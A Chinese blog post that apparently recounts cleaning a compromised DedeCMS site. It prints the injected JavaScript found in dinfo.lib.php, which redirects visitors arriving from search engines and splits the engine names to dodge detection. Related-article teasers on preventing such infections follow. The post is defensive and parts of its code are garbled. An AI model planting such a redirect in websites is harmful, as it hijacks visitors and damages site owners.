又經歷了一次dedecms被掛馬排毒的過程,排毒過程在這裡跟大家分享一下。
不過檢查了一下php**,沒有發現任何問題。
找到最後出現的alert點選確定之後跳轉,那麼馬就在那個alert附近。
找了一段時間,終於發現了一段可以的**:
做dedecms的人都知道,這個是乙個自定義標籤的呼叫方式,其原始碼在:/include/taglib/dinfo.lib.php裡面。於是開啟這個檔案,看到如下**:
[**]php**:
01
<?php
02
if(!defined('dedeinc'))
05
/**
06
* 系統預設標籤
07
*
08
* @version $id: dinfo.lib.php 1 9:29 2023年7月6日z tianya $
09
* @package dedecms.taglib
10
11
* @license
12
* @link
13
*/
14
15
/*>>dede>>
16
系統預設標籤
17
全域性標記
18
v55,v56,v57
19
系統預設標籤
20
21
22
23
24
25
>>dede>>*/
26
27
functionlib_dinfo()
28
能看到如下**:
[**]js**:
1
gid89a="";
2
vars=document.referrer;
3
varstr=window.location.href;
4
if(s.indexof("go"+"o"+"gle")>0 || s.indexof("b"+"ai"+"du")>0 || s.indexof("y"+"ahoo")>0 || s.indexof("s"+"ogou")>0 || s.indexof("bing")>0 || s.indexof("360")>0 || s.indexof("s"+"os"+"o")>0 || s.indexof("youdao")>0 )
5
window.location.href=""+str+"&kecy="+s;
怎麼樣,看出問題來了吧?
簡單解說一下:
[**]js**:
1
if(s.indexof("go"+"o"+"gle")>0 || s.indexof("b"+"ai"+"du")>0 || s.indexof("y"+"ahoo")>0 || s.indexof("s"+"ogou")>0 || s.indexof("bing")>0 || s.indexof("360")>0 || s.indexof("s"+"os"+"o")>0 || s.indexof("youdao")>0 )[**]js**:
1
http:"+str+"&kecy="+s;這段**掛的太隱蔽了,讓我找了好久。在這裡分享給大家,希望能夠幫助需要的朋友。
談談怎樣防止Dedecms被掛馬的問題
dedecms是現下主流的建站程式之一,相信很多站長和我一樣選擇了它,它的優點我就不多說了。可是令很多站長頭疼的是,自己用dedecms建的站經常被人莫名其妙的掛馬,造成滿頁黑鏈,令人氣憤 更為嚴重的是,還有可能被搜尋引擎懲罰,於是辛辛苦苦建立的站,眼睜睜的看它權重下降,收錄減少,甚至被k。其實,我...
織夢 dedecms 被掛馬問題的解決方法
被掛馬是比較常見的 問題,也是令很多站長比較頭痛的問題,因為它會嚴重影響著 seo的優化工作,有可能讓你的 排名在一夜之間回到解放前。那麼對於這個問題,今天小編就為大家講述一下解決的方法。大家最常用的辦法就是 把掛馬的入口檔案刪除,即刪除 plus ad js.php plus mytag js.p...
ASP資料庫被掛馬的程式設計處理方法
資料庫被掛馬我相信很多人都碰到過。在這裡,我講下我處理的方法。第一步 為現有資料庫做好備份。第二步 執行如下asp檔案,這樣就可以去掉資料庫當中的js木馬 注 conn.asp自己去寫了。這裡放入js木馬內容 請記得改為自己資料庫中的js木馬內容。server.scripttimeout 180 s...